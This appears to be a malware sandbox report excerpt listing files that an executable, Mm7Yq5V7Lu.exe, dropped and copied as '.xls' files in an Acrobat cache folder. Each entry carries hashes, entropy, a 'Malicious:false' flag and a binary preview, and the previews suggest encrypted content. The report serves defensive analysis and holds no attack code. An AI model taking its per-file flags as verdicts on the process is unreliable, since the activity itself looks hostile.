                                                                                                                                                      Preview: ..Z2.....!......#.X....I.DAt ...l.%`@I|.....G.Zg.q.Z...Z.`.n..C!,Y<.p9V...H..:.v.....r.\.......k.8.k.<.R..B..7F.)..w..[....:.`1.}..~..^.....7P...+.h.8..$Q...`.o.S..L...o...<2.P_P...jm.....s.g..N..~.YF.:...U%.5....v....Y...Y...*.yx..f;<D-4.v0q.8.."q.6.Nc.....E..y..0.-U.#y./....R...@.e@...v$....}.......x.oq..N.,Y...pu.....et...ZGb...a.3.!...d1...|.T..;../s....YJ...0!.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0998db3a32ab3f41_0.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1200
                                                                                                                                                      Entropy (8bit):5.866688545311257
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:XrJcAa85O+lrOczK8sevWAVgKTaCB7RZ0cHYIgtyUz3+:XrJBhO+zCwgck38b
                                                                                                                                                      MD5:FE5BECD7023AE0ABD6DC20A62ABF90CE
                                                                                                                                                      SHA1:50621273E1375A741E1DDCD2198063B343D733C0
                                                                                                                                                      SHA-256:8E94A772DE9B138FEDB13B3A34025A950DFA99E48DAAC1694AFC3E49C76DD16F
                                                                                                                                                      SHA-512:54B7BFD8B2ADA5693069D76010BDD06F0288F34C853E3FE00DD0E08CAA2E723271E496FB210E1B95DA624FB4D38FF1F693BAF26A4514F763408998626D84BD4D
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..Z2.....!......#.X....I.DAt ...l.%`@I|.....G.Zg.q.Z...Z.`.n..C!,Y<.p9V...H..:.v.....r.\.......k.8.k.<.R..B..7F.)..w..[....:.`1.}..~..^.....7P...+.h.8..$Q...`.o.S..L...o...<2.P_P...jm.....s.g..N..~.YF.:...U%.5....v....Y...Y...*.yx..f;<D-4.v0q.8.."q.6.Nc.....E..y..0.-U.#y./....R...@.e@...v$....}.......x.oq..N.,Y...pu.....et...ZGb...a.3.!...d1...|.T..;../s....YJ...0!.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0f25049d69125b1e_0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:SysEx File - Lowrey
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1168
                                                                                                                                                      Entropy (8bit):5.774819965102689
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TS9tU8n7cunb+gzK8sevWAVgKTaCB7RZ0cHYIgtyUzR26:mPN7NzCwgck38eP
                                                                                                                                                      MD5:2840FD675D4E3A5593882126B7976527
                                                                                                                                                      SHA1:B9D63B84B5D99C4810A965215284DDF2220845F1
                                                                                                                                                      SHA-256:5FB4195A680B68088FD678EDFDB5AB5B77E27BDB49E7A7AE640AD7484A2E9B0C
                                                                                                                                                      SHA-512:233DA495367F603FD0BA8424C8548D4191000C62BA650A356FE5288205C9CA4BAD0A63FB70F3C8C85066953C49F55243B6894A8690CC1FFF898BD773F3C157F5
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ...Z....,Sv^$P..r..U.<K..y1($zYJ.@.!8u.t...K.A~...[...5.T....H..~C....nb=p..9...q.]F.U..$..7.c.....B...z_."P.g..|...[.....!..m.....&[.hDF<...X..A.....vk....tLO.5\..Z1.....O0.k.#.9.....!.*.K....r.O.a.?....>.!..Pr..!..C>Y.r-.n...I...z?..S.B8d.U..c>..oY,.0.t.....aE.jcf.U8.............$l....$.@..,qB.l.....W.4..f.g.!./.).O\..D..d';..f#..).l.FZ.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0f25049d69125b1e_0.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:SysEx File - Lowrey
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1168
                                                                                                                                                      Entropy (8bit):5.774819965102689
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TS9tU8n7cunb+gzK8sevWAVgKTaCB7RZ0cHYIgtyUzR26:mPN7NzCwgck38eP
                                                                                                                                                      MD5:2840FD675D4E3A5593882126B7976527
                                                                                                                                                      SHA1:B9D63B84B5D99C4810A965215284DDF2220845F1
                                                                                                                                                      SHA-256:5FB4195A680B68088FD678EDFDB5AB5B77E27BDB49E7A7AE640AD7484A2E9B0C
                                                                                                                                                      SHA-512:233DA495367F603FD0BA8424C8548D4191000C62BA650A356FE5288205C9CA4BAD0A63FB70F3C8C85066953C49F55243B6894A8690CC1FFF898BD773F3C157F5
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ...Z....,Sv^$P..r..U.<K..y1($zYJ.@.!8u.t...K.A~...[...5.T....H..~C....nb=p..9...q.]F.U..$..7.c.....B...z_."P.g..|...[.....!..m.....&[.hDF<...X..A.....vk....tLO.5\..Z1.....O0.k.#.9.....!.*.K....r.O.a.?....>.!..Pr..!..C>Y.r-.n...I...z?..S.B8d.U..c>..oY,.0.t.....aE.jcf.U8.............$l....$.@..,qB.l.....W.4..f.g.!./.).O\..D..d';..f#..).l.FZ.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\230e5fe3e6f82b2c_0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1168
                                                                                                                                                      Entropy (8bit):5.797092831961121
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:PbZGVuvprMBBXK6JTzK8sevWAVgKTaCB7RZ0cHYIgtyUz8+t:TZHhrMnjTzCwgck38mt
                                                                                                                                                      MD5:EECDA5CD32B0F9F07DE80B2B5FA6F8F2
                                                                                                                                                      SHA1:8484BA129E2B9459180AB8F6A139903193FBA197
                                                                                                                                                      SHA-256:36F26795D0A52C58CFA9F847986B8B62DAA78613477D2C5B77A0F46B47100907
                                                                                                                                                      SHA-512:DD52E64A01F00BC1DC6E3D5A35B8D6969FC05DB14245869A1B922A3B5F0162E07F26612D1FCCE49FA0AF06F7E70939EA80FF3E8B49C6AE792D021D9E346CBCBB
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ...r..gH\^&C..~?...]......>e..../.Ky.N._"......>.e.'klbU..x..u.<..6@...t........wVx....1a.R.....Y.....@.g..5......i.. ..v|N..v.*......tg0.D.>.P...ej...3Le.^.../.5.+.y.r.A.s_:.@.$......{.O.-.H.~...pm.l.^..X.f...h..F.d..e-.p..v'...r.2.......M.^.GF._..f..}..Bu....R7A.EP...uil.@.*fM:.#x.v=dU...O.e...Hj.....Q. ....d.ZM$['..3V.S.<I<.M....V..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\230e5fe3e6f82b2c_0.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1168
                                                                                                                                                      Entropy (8bit):5.797092831961121
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:PbZGVuvprMBBXK6JTzK8sevWAVgKTaCB7RZ0cHYIgtyUz8+t:TZHhrMnjTzCwgck38mt
                                                                                                                                                      MD5:EECDA5CD32B0F9F07DE80B2B5FA6F8F2
                                                                                                                                                      SHA1:8484BA129E2B9459180AB8F6A139903193FBA197
                                                                                                                                                      SHA-256:36F26795D0A52C58CFA9F847986B8B62DAA78613477D2C5B77A0F46B47100907
                                                                                                                                                      SHA-512:DD52E64A01F00BC1DC6E3D5A35B8D6969FC05DB14245869A1B922A3B5F0162E07F26612D1FCCE49FA0AF06F7E70939EA80FF3E8B49C6AE792D021D9E346CBCBB
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ...r..gH\^&C..~?...]......>e..../.Ky.N._"......>.e.'klbU..x..u.<..6@...t........wVx....1a.R.....Y.....@.g..5......i.. ..v|N..v.*......tg0.D.>.P...ej...3Le.^.../.5.+.y.r.A.s_:.@.$......{.O.-.H.~...pm.l.^..X.f...h..F.d..e-.p..v'...r.2.......M.^.GF._..f..}..Bu....R7A.EP...uil.@.*fM:.#x.v=dU...O.e...Hj.....Q. ....d.ZM$['..3V.S.<I<.M....V..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2798067b152b83c7_0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1168
                                                                                                                                                      Entropy (8bit):5.781377630993979
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:PVtQzwPVDFzIkzK8sevWAVgKTaCB7RZ0cHYIgtyUzU/:PDtvzzzCwgck387/
                                                                                                                                                      MD5:30D873DDC61E2C088A9D76D2EB4463E6
                                                                                                                                                      SHA1:04A7DD237F24E1E86D5FC4BA6EBDC63029F4286D
                                                                                                                                                      SHA-256:62F43DCD562B706A587137314EA8B01AFD99E00DC10B8A5F4836E3A66BDA54CE
                                                                                                                                                      SHA-512:B66408E4322F95E1F53C734EF55ED6285DD64199F52E5AAD9AC137B7F53DE6BD8AC3EA373B839CA161019FF00907BC3124693A61E97034EFBC68C53C22048A73
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..~&of.$..../Y1.|..D.j...,.....;... (k..!I.b..~..M.....0..}...?9!..S..m. k%5..XN.w.X...$.....w....y<.7.PS....r...~.0.3.....1i.. ...e.........5..9_.......B.g.~#N9k.V..rW.J..[.N..H.+|......+e.V.9...l.L.}..M..u.--..G.'..e.@..(....)..B..{.S..Z)...Id==....M....n./.$...I...O{....F...6.v.K..7..[.[.N......)Z.....(_.......u.r..F"x..+xA.qq....|s67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2798067b152b83c7_0.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1168
                                                                                                                                                      Entropy (8bit):5.781377630993979
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:PVtQzwPVDFzIkzK8sevWAVgKTaCB7RZ0cHYIgtyUzU/:PDtvzzzCwgck387/
                                                                                                                                                      MD5:30D873DDC61E2C088A9D76D2EB4463E6
                                                                                                                                                      SHA1:04A7DD237F24E1E86D5FC4BA6EBDC63029F4286D
                                                                                                                                                      SHA-256:62F43DCD562B706A587137314EA8B01AFD99E00DC10B8A5F4836E3A66BDA54CE
                                                                                                                                                      SHA-512:B66408E4322F95E1F53C734EF55ED6285DD64199F52E5AAD9AC137B7F53DE6BD8AC3EA373B839CA161019FF00907BC3124693A61E97034EFBC68C53C22048A73
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..~&of.$..../Y1.|..D.j...,.....;... (k..!I.b..~..M.....0..}...?9!..S..m. k%5..XN.w.X...$.....w....y<.7.PS....r...~.0.3.....1i.. ...e.........5..9_.......B.g.~#N9k.V..rW.J..[.N..H.+|......+e.V.9...l.L.}..M..u.--..G.'..e.@..(....)..B..{.S..Z)...Id==....M....n./.$...I...O{....F...6.v.K..7..[.[.N......)Z.....(_.......u.r..F"x..+xA.qq....|s67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\28daa88523128699_0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1168
                                                                                                                                                      Entropy (8bit):5.733149742965018
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:lROZtaBL6NlVpzBzK8sevWAVgKTaCB7RZ0cHYIgtyUzCJ:loDm6NlVptzCwgck38p
                                                                                                                                                      MD5:1B25115EF1F03674EFBB9BD1E34382DC
                                                                                                                                                      SHA1:BA26E878B3393DD5BE8C702898D9B46FDE5D75D8
                                                                                                                                                      SHA-256:635467B1F2787E6DD4BA9DE09E8807A36BE60AE75CD85D9E9DDCF0FDB58DE0E5
                                                                                                                                                      SHA-512:2FCAD583B1E89AC49AED3289F4E6D679E3D4A3593B697FD621483062958560B799B55D31780CA891FA4A038BD68D9093455E8078398CC07F736DC679B2962BE1
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: s...m..V/..l.t..*..nf4...S9..E.F[...r.Qg.('&1...$..\@..G......q..T.ov.h.&...}.5.H`...V.4;W..5.<.h...o(v;.s\W........&95.%.L.p&.\3p....C.9.!..8..5.......>9....Q.6.....-G......A.AL.EY...........:..<.P.@... ....V.c.#..(....A.0~JZI.>....1...6..m...`-..7]..xfH....?.z....kJ#]..8.k7.Y...b.:....YCL.FP(..:}...4..L15.......c.5..9.\.J..].~.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\28daa88523128699_0.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1168
                                                                                                                                                      Entropy (8bit):5.733149742965018
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:lROZtaBL6NlVpzBzK8sevWAVgKTaCB7RZ0cHYIgtyUzCJ:loDm6NlVptzCwgck38p
                                                                                                                                                      MD5:1B25115EF1F03674EFBB9BD1E34382DC
                                                                                                                                                      SHA1:BA26E878B3393DD5BE8C702898D9B46FDE5D75D8
                                                                                                                                                      SHA-256:635467B1F2787E6DD4BA9DE09E8807A36BE60AE75CD85D9E9DDCF0FDB58DE0E5
                                                                                                                                                      SHA-512:2FCAD583B1E89AC49AED3289F4E6D679E3D4A3593B697FD621483062958560B799B55D31780CA891FA4A038BD68D9093455E8078398CC07F736DC679B2962BE1
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: s...m..V/..l.t..*..nf4...S9..E.F[...r.Qg.('&1...$..\@..G......q..T.ov.h.&...}.5.H`...V.4;W..5.<.h...o(v;.s\W........&95.%.L.p&.\3p....C.9.!..8..5.......>9....Q.6.....-G......A.AL.EY...........:..<.P.@... ....V.c.#..(....A.0~JZI.>....1...6..m...`-..7]..xfH....?.z....kJ#]..8.k7.Y...b.:....YCL.FP(..:}...4..L15.......c.5..9.\.J..].~.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2a426f11fd8ebe18_0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1136
                                                                                                                                                      Entropy (8bit):5.654605892770175
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:uGcZmDhN2hIq3DSxzK8sevWAVgKTaCB7RZ0cHYIgtyUzY:uGM6hN2h7azCwgck38p
                                                                                                                                                      MD5:088863733109CA7BDD2560D9CF6AA9B8
                                                                                                                                                      SHA1:5FA463064E159A6084B6D7248D9F2F938527D435
                                                                                                                                                      SHA-256:44670162D1BE1B4BB1BBCF5433EE42AE3CB490E0B533F1C83633C2C372D43615
                                                                                                                                                      SHA-512:250250199D66A7CD52C56B2D9040D1823D9DC74E1E7C9CB53B02DCA6A1E818415B0B863F1684BC52A58A754A35697D4BB4C33E05D10107CC6A58017E704B69DF
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: }q,..X...5.....q..>,'..64......;..8}...:Z.,|....3.;........L.S..6D...(6...#..v..#..i.K...`d.9.......~....2.%..5..$..zb.u..W.(..G3I...X.Y....S-....3..<..w,..L...{.i(.Cf.........40.I.)k...E...6+@D_P.V..5.{.3'8...7..B. f%N.p..[........m.....J....Y.b.IJ......51y[O...x[.x.t.^.C.V.<.Eh.g}..y.n...M(.............67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2a426f11fd8ebe18_0.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1136
                                                                                                                                                      Entropy (8bit):5.654605892770175
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:uGcZmDhN2hIq3DSxzK8sevWAVgKTaCB7RZ0cHYIgtyUzY:uGM6hN2h7azCwgck38p
                                                                                                                                                      MD5:088863733109CA7BDD2560D9CF6AA9B8
                                                                                                                                                      SHA1:5FA463064E159A6084B6D7248D9F2F938527D435
                                                                                                                                                      SHA-256:44670162D1BE1B4BB1BBCF5433EE42AE3CB490E0B533F1C83633C2C372D43615
                                                                                                                                                      SHA-512:250250199D66A7CD52C56B2D9040D1823D9DC74E1E7C9CB53B02DCA6A1E818415B0B863F1684BC52A58A754A35697D4BB4C33E05D10107CC6A58017E704B69DF
                                                                                                                                                      Malicious:false
